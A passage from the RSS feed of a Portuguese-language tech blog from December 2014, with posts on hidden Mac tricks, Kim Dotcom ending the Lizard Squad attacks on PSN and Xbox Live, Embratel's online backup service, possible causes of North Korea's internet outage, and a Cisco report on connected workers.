&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Ao preencher formulários de pedidos on-line, o Mac muitas vezes ignora 
menus suspensos como a seleção de &quot;mês&quot; ou &quot;ano&quot;. Para permitir que o 
computador abra esses menus, abra as Preferências do Sistema =&amp;gt; 
Teclado e defina &quot;Full Keyboard Access&quot; para &quot;todos os controles.&quot;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;b&gt;6. Use a pesquisa Spotlight como uma calculadora&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Pressionando Command + Barra de espaço a busca Spotlight da Apple é 
aberta, o que permite pesquisar arquivos do computador. O que pouca 
gente sabe é que o recurso também é capaz de realizar contas básicas de 
matemática, como multiplicação e divisão. Digite a operação na barra de 
pesquisas e ela será resolvida. Usuários do OS X Yosemite conseguem 
também pesquisar na web por meio da ferramenta.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;b&gt;&lt;b&gt;7. Agrupe arquivos em uma pasta&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Basta destacar ou clicar nos arquivos que deseja agrupar e clicar em &quot;New Folder With Selection”&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;8. Exposé em câmera lenta&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Mantenha pressionada a tecla &quot;Shift&quot; e aperte tecla Exposé (geralmente 
F9, F10 ou F11). Utilize este truque para uma troca de janela menos 
abrupta.&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;b&gt;9. Ícone escondido&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Ao salvar um documento Word ou PowerPoint (assim como a maioria dos 
outros tipos de documentos), um pequeno ícone aparece na parte superior 
da barra de ferramentas, ao lado do nome do documento. Basta arrastá-lo 
para onde desejar para mover o arquivo também.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;b&gt;&lt;b&gt;10. Crie um ícone da Apple&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Em qualquer computador da Apple, você pode criar um ícone da Apple, mantendo pressionadas as teclas Option + Shift + K.&lt;b&gt;&lt;b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&amp;nbsp;&lt;/b&gt;&amp;nbsp;&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&amp;nbsp;&lt;b&gt;&amp;nbsp;&amp;nbsp; &lt;/b&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2014/12/10-truques-escondidos-no-mac.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpo3t-keBYPFGpWF_nG_UBAWEOaHpOBUpo4GNClQ1XGA_zkKTIK9QhJuiXTNOF_GklORaL0RDkQWVPncQZnKz0xglJY-NciNXa_vguy_4K_dprJk445T7Yh0SWKel-SSHk5b4vQ5Mtme8/s72-c/apple.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-4240334672215952102</guid><pubDate>Sat, 27 Dec 2014 00:24:00 +0000</pubDate><atom:updated>2014-12-26T22:24:13.266-02:00</atom:updated><title>Kim Dotcom convence hackers a interromper ataque a PSN e Xbox Live</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTeTFEGeHvQolrPkRoYcVzpll_UHpOiHMhPnjEio6iq5AbTonr7J12s1JCuaCttFmQ1-TAyKi8iHZSDJExdq8V3qIrQp2NvYKwizW4laaOLgcx-y40OaKlGBQzW2oyMCCpK-Qm_CQuFh4/s1600/kim-dotcom.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTeTFEGeHvQolrPkRoYcVzpll_UHpOiHMhPnjEio6iq5AbTonr7J12s1JCuaCttFmQ1-TAyKi8iHZSDJExdq8V3qIrQp2NvYKwizW4laaOLgcx-y40OaKlGBQzW2oyMCCpK-Qm_CQuFh4/s1600/kim-dotcom.jpg&quot; height=&quot;203&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
As redes do PlayStation e do Xbox passaram quase o Natal inteiro fora do
 ar graças a um ataque hacker do grupo Lizard Squad, e quem salvou o dia
 foi o fundador do Mega, Kim Dotcom.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Dotcom usou o Twitter para convencer o pessoal do Lizard a desistir dos 
ataques em troca de 3 mil contas premium em seu site de 
compartilhamento. E deu certo, conforme relatado pelo The Next Web Pouco depois de a conversa ter ocorrido, a PlayStation Network e a Xbox Live começaram a voltar à normalidade.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Os ataques às redes se tornaram uma constante para os jogadores, que 
enfrentam esses problemas rotineiramente. Principalmente quem tem 
PlayStation, pois a PSN parece ser o alvo preferido dos hackers - isso 
sem contar o ataque que a Sony vem sofrendo nas últimas semanas.. &lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjknTQrJyJJZblvDrLan3JYYqWD8wY_JttoUlWJoZZhVPPjb2E0B0_V3Qli8C71eN3hAGZmKGHvQOMeiRY7Up8QpA2kCieAzIc5RIR4WdRXY6gdg530rmmKq7_zcvcEo6hm8rZ0Lbssphg/s1600/contato.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjknTQrJyJJZblvDrLan3JYYqWD8wY_JttoUlWJoZZhVPPjb2E0B0_V3Qli8C71eN3hAGZmKGHvQOMeiRY7Up8QpA2kCieAzIc5RIR4WdRXY6gdg530rmmKq7_zcvcEo6hm8rZ0Lbssphg/s1600/contato.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2014/12/kim-dotcom-convence-hackers-interromper.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTeTFEGeHvQolrPkRoYcVzpll_UHpOiHMhPnjEio6iq5AbTonr7J12s1JCuaCttFmQ1-TAyKi8iHZSDJExdq8V3qIrQp2NvYKwizW4laaOLgcx-y40OaKlGBQzW2oyMCCpK-Qm_CQuFh4/s72-c/kim-dotcom.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-4102020432198349238</guid><pubDate>Sat, 27 Dec 2014 00:14:00 +0000</pubDate><atom:updated>2014-12-26T22:14:22.732-02:00</atom:updated><title>Backup online garante a continuidade dos negócios</title><description>&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;Fazer cópias de segurança das informações periodicamente é essencial
 para permitir a mobilidade dos colaboradores e retomar as operações de 
forma ágil em caso de desastre&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPydSp4mePPjlGD3LZV2KeCTILNOSx1v8xQL6RKnVgZV9RzKGo5NwYYM3HTSc09vPi6MaRGee1MBu3haYsTSWbxcqn4tYf_zLUU5HbxLVd6QqHc9exDcCLvnZ7viRpVNhLdLvA1ZP_6c/s1600/backuponline.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPydSp4mePPjlGD3LZV2KeCTILNOSx1v8xQL6RKnVgZV9RzKGo5NwYYM3HTSc09vPi6MaRGee1MBu3haYsTSWbxcqn4tYf_zLUU5HbxLVd6QqHc9exDcCLvnZ7viRpVNhLdLvA1ZP_6c/s1600/backuponline.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;Quanto tempo sua empresa leva para voltar às atividades após um 
incidente na área de tecnologia da informação (TI)? O retorno rápido vai
 depender das medidas de segurança adotadas. Com a computação em nuvem 
firmando-se cada vez mais como um caminho ágil e seguro para 
infraestrutura tecnológica, o backup online tem ganhado mais adeptos a 
cada dia.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;“Nos últimos anos surgiram serviços especializados e as empresas têm a 
facilidade de fazer o backup online, na nuvem”, destaca o consultor e 
professor de Segurança da Informação dos cursos de pós-graduação da 
Faculdade de Informática e Administração Paulista (Fiap), Edison Fontes.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;A Embratel, por exemplo, criou soluções especialmente projetadas para 
atender às necessidades das empresas que precisam fazer cópias de suas 
informações com segurança, simplicidade e rapidez. Uma das vantagens do 
backup online é a possibilidade de as empresas protegerem não apenas as 
informações que estão nos escritórios, mas também as armazenadas em 
dispositivos móveis dos colaboradores.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;Para isso, basta acessar a plataforma da Embratel com um usuário e 
senha&amp;nbsp; e selecionar o arquivo desejado, por meio de um computador 
(Windows ou Mac), smartphone ou tablet. Pelo Painel de Controle, é 
possível administrar o acesso aos dados de acordo com o perfil de cada 
funcionário. Além disso, é possível controlar os arquivos que foram 
recuperados por usuário. Também é possível ver os acessos móveis 
realizados pelos colaboradores.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;A oferta da Embratel se diferencia por oferecer garantia de segurança e 
redundância geográfica, ou seja, os dados são copiados automaticamente 
pela empresa em mais de um endereço físico. A ferramenta conta com um 
painel interativo que possibilita o agendamento e o controle de backups a
 qualquer hora, de qualquer lugar. O acesso utiliza criptografia para 
garantir a privacidade da informação.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;Adriana Coutinho, Diretora Executiva da Embratel e Claro Empresarial e 
Cloud, afirma que a grande vantagem da plataforma cloud frente à 
infraestrutura tradicional é a redução da complexidade das operações de 
TI, uma das grandes preocupações dos empresários modernos. “Nosso 
portfólio de produtos antecipa tendências de mercado e, com absoluta 
certeza, somos o maior player da América Latina, entregando 
conectividade e tecnologia em total sinergia”, diz a Diretora Executiva;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;&lt;strong&gt;Vantagens para o trabalho remoto&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;Com o aumento do uso da mobilidade no mercado corporativo, muitos 
executivos trabalham remotamente e estão o tempo todo alimentando ou 
consultando arquivos com dados estratégicos para os negócios. O serviço 
de cópia na nuvem vem também para atender esses usuários corporativos. 
Eles precisam de segurança e de suas informações disponíveis para acesso
 pelo computador de casa, pelo smartphone, enquanto esperam um voo, ou 
pelo tablet na hora de fazer uma apresentação, por exemplo.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-weight: 17px;&quot;&gt;Com a onda do Bring Your Own Device (BYOD), ou traga seu próprio 
dispositivo móvel para o ambiente de trabalho, algumas empresas 
brasileiras já permitem que os funcionários utilizem o mesmo aparelho 
para uso pessoal e corporativo, o que exige um reforço da segurança para
 proteção dos dados de negócios. O backup online é uma das ferramentas 
de proteção também em caso de roubo ou furto, uma vez que os arquivos 
importantes ficam copiados e guardados na nuvem. Afinal, como diz o 
ditado, prevenir é sempre melhor do que remediar. &lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2014/12/backup-online-garante-continuidade-dos.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPydSp4mePPjlGD3LZV2KeCTILNOSx1v8xQL6RKnVgZV9RzKGo5NwYYM3HTSc09vPi6MaRGee1MBu3haYsTSWbxcqn4tYf_zLUU5HbxLVd6QqHc9exDcCLvnZ7viRpVNhLdLvA1ZP_6c/s72-c/backuponline.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-3514313640487681359</guid><pubDate>Sat, 27 Dec 2014 00:03:00 +0000</pubDate><atom:updated>2014-12-26T22:06:12.462-02:00</atom:updated><title>Ataque é causa mais provável para &#39;blecaute digital&#39; na Coreia do Norte</title><description>&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;Para empresas, um país ser autor do ataque não é plausível; veja hipóteses.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;Faz mais sentido ser obra de &quot;garoto com máscara de Guy Fawkes&quot;, dizem.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixAclnMpiT1ZQn9pK5vXRKRz-aI9e4O-3aPQZ-5SmxIGH__Kv7Zr8vqv6bVy_4NNoGqgShf5S5_QnqbH7vCMrwhjPCaeJPM2OjVULSc2ANIV-R9JIvr3cP2Po9qqmdsxo0NiIY-Li3240/s1600/protesto.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixAclnMpiT1ZQn9pK5vXRKRz-aI9e4O-3aPQZ-5SmxIGH__Kv7Zr8vqv6bVy_4NNoGqgShf5S5_QnqbH7vCMrwhjPCaeJPM2OjVULSc2ANIV-R9JIvr3cP2Po9qqmdsxo0NiIY-Li3240/s1600/protesto.jpg&quot; height=&quot;240&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;O “apagão cibernético” enfrentado pela Coreia do Norte nesta segunda-feira (22/12/2014) e que teve uma reedição
 nesta terça-feira (23/12/2014), dias após o presidente dos Estados Unidos, 
Barack Obama, prometer responder “proporcionalmente” à invasão aos 
sistemas da Sony, atribuído a Pyongyang, pode ter sido provocado por um 
ataque cibernético, afirmam especialistas&lt;b&gt;&lt;/b&gt;.
 Essa é hipótese mais plausível, dizem eles, mas os responsáveis pela 
ação não são consenso. A infraestrutura de rede norte-coreana é pequena e
 frágil, o que não faz da suspensão da internet norte-coreana uma missão
 tão árdua e passível de ter sido causada até por um “garoto usando a 
máscara de Guy Fawkes”.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;Matthew Prince, cofundador da CloudFlare, e James Cowie, cientista-chefe
 da Dyn Research, enumeraram as possíveis causas da instabilidade 
seguida da completa interrupção da conexão na Coreia do Norte. A 
primeira é uma empresa que costuma fornecer segurança contra ataques 
cibernéticos e a segunda monitora instabilidades na rede mundial de 
computadores. Veja abaixo os vários cenários traçados por eles:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;&lt;b&gt;Saída de fininho&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
 Após a Coreia do Norte ter declarado no domingo (21/12/2014) que estava pronta 
para um embate com os Estados Unidos, o próprio governo poderia ter 
“desligado” a internet a fim de evitar a maior exposição de seus 
sistemas. “Nós já vimos isso antes quando outros países com baixos 
níveis de conectividade e governos com alto grau de poder sobre 
telecomunicações cessaram a conexão à internet”, afirmou Prince, citando
 a Síria. A rede norte-coreana de fato é controlada pelo governo, que 
tem autonomia para tomar esse tipo de decisão, mas parece improvável que
 Kim Jong-un,
 o ditador norte-coreano, autorizaria um “blecaute digital”, o que 
enfraqueceria ainda mais sua imagem perante a comunidade internacional.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;&lt;b&gt;Derrubada chinesa&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
 Outra possibilidade é a China ter interrompido a conexão do país 
vizinho. Isso poderia acontecer porque a China Unicorn, empresa estatal 
das telecomunicações chinesa, é a gestora das quatro únicas redes de 
internet que a Coreia do Norte dispõe. Nesta segunda (23/12/2014), durante uma 
reunião do Conselho de Segurança da ONU, a China evitou fazer volume às críticas contra a possível ligação de Pyongyang ao ataque à Sony.
 O país, membro permanente do grupo, preferiu defender um diálogo entre 
EUA e Coreia do Norte sobre o ocorrido. Para Prince, caso a “saída de 
fininho” ou a “derrubada chinesa” tenham sido as causas da interrupção, é
 impossível definir a diferença entre uma e outra.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;&lt;b&gt;Fios cortados&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
 O “blecaute” pode ter sido causado ainda pelo rompimento de cabos. “É 
improvável que a Coreia do Norte tenha um contrato com a Cisco de 
suporte constante e uma fonte crítica de energia pode ter falha por 
razões diversas”, afirmou Prince. Cowie também aponta essa como uma das 
possíveis causas, mas afirma que é muito improvável já que antes da 
suspensão total da conexão houve instabilidade. “O padrão de longa 
instabilidade, seguida de suspensão, torna menos provável que seja o 
resultado de um simples corte de cabo de fibra ótica.”&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;&lt;b&gt;Ataque de negação&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
 A aposta mais plausível, dizem os especialistas, é de um ataque de 
negação, ou DDoS. “Enquanto nós não sabemos quanto é a capacidade [de 
tráfego de dados] entrando na Coreia do Norte e saindo dela, é 
improvável que seja mais do que dezenas de gigabits por segundo. Dado 
que os maiores ataques DDoS são de uma magnitude muito maior do que 
isso, é concebível que um ataque tenha saturado a conexão e deixado o 
site offline”, diz Prince.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;Apesar de coicidentemente o “apagão” ter ocorrido alguns dias após a 
ameaça dos Estados Unidos, a rede norte-coreana é tão frágil que não 
precisaria de um esforço governamental para derrubá-la.&amp;nbsp; “Se foi mesmo 
um ataque, eu ficaria bem mais surpreso se um governo tivesse lançado 
esse ataque do que se fosse obra de um garoto usando máscara de Guy 
Fawkes”, afirmou. Outra evidência é a restauração da conexão, ainda que a
 Coreia do Norte tenha enfrentado uma segunda queda da internet nesta 
terça-feira. “Eu acredito que é uma boa evidência de que a interrupção 
não foi causada por um ataque patrocinado por um estado, caso contrário a
 internet ainda estaria fora do ar.” &lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><link>http://computersservicetecnica.blogspot.com/2014/12/ataque-e-causa-mais-provavel-para.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixAclnMpiT1ZQn9pK5vXRKRz-aI9e4O-3aPQZ-5SmxIGH__Kv7Zr8vqv6bVy_4NNoGqgShf5S5_QnqbH7vCMrwhjPCaeJPM2OjVULSc2ANIV-R9JIvr3cP2Po9qqmdsxo0NiIY-Li3240/s72-c/protesto.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-7482046331669965228</guid><pubDate>Sat, 20 Dec 2014 02:15:00 +0000</pubDate><atom:updated>2014-12-20T00:15:09.021-02:00</atom:updated><title>Profissional do futuro: descubra se você é um deles</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;
Eles não se contentam com pouco; muito pelo contrário. O Joe e o Daniel 
são dois exemplos de profissionais totalmente conectados e que apostam 
na tecnologia para moldar o seu dia a dia, dentro e fora do trabalho. E,
 segundo um relatório recém-divulgado pela Cisco – o Connected World 
Technology Report – eles representam exatamente o que estão chamando de 
“profissional do futuro”.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.blogger.com/video.g?token=AD6v5dylowHP5QY51QGmfVWxkwdfGeCqXuFl_FUU-xaWUPhOeXK3bOFFnWy8UcTrw5j84wt7ptEBk5lHn1z1Xf48QQ&#39; class=&#39;b-hbp-video b-uploaded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
Não é difícil encontrar quem viva assim nos dias de hoje. Logo ao 
acordar, o indivíduo vai direto para o smartphone checar seus e-mails e 
até responder algo mais importante. Permanece conectado através de 
diversos dispositivos durante toda a jornada de trabalho. E, no final do
 expediente, vai embora ainda conectado – e, se precisar, ainda 
trabalhando.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
Essa é uma mostra de como a tecnologia está moldando o futuro do 
trabalho e como os dispositivos, aplicativos e soluções estão 
possibilitando novas formas de produzir. Nesse ambiente altamente 
conectado, surgiu um novo estilo de profissional, o &quot;Supertasker&quot;, 
aquele que é capaz de executar diversas funções simultaneamente. Vale 
destacar: supertasker é diferente de multitasker, a pessoa capaz de 
transitar entre diversas atividades ao mesmo tempo.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
Segundo um estudo recente da Universidade de Utah, nos Estados Unidos, 
apenas dois e meio por cento da população é, de fato, supertasker.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
Genético ou não, nisso o Joe e o Daniel também se parecem. Ambos se 
julgam supertaskers. O Daniel trabalha com um monitor externo além do 
seu notebook, um tablet, dois smartphones e uma pulseira inteligente; 
tudo conectado e ao mesmo tempo.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
O Joe também é assim, extremamente conectado; usa dois smartphones ao 
mesmo tempo, não larga do seu notebook e muito menos do tablet.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
Outro fator interessante revelado pelo relatório é que, até 2020, a 
maioria dos profissionais acredita que os smartphones e os dispositivos 
vestíveis serão os dispositivos conectados mais importantes na força de 
trabalho. O Joe inclusive antecipa essa tendência; ele já vive com um 
smartwatch em um braço e uma pulseira inteligente no outro.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
Os profissionais de RH acreditam que os supertaskers elevam as 
expectativas de alta performance nas empresas. E quase dois terços dos 
entrevistados defendem que até o ano de 2020, supertasking será a 
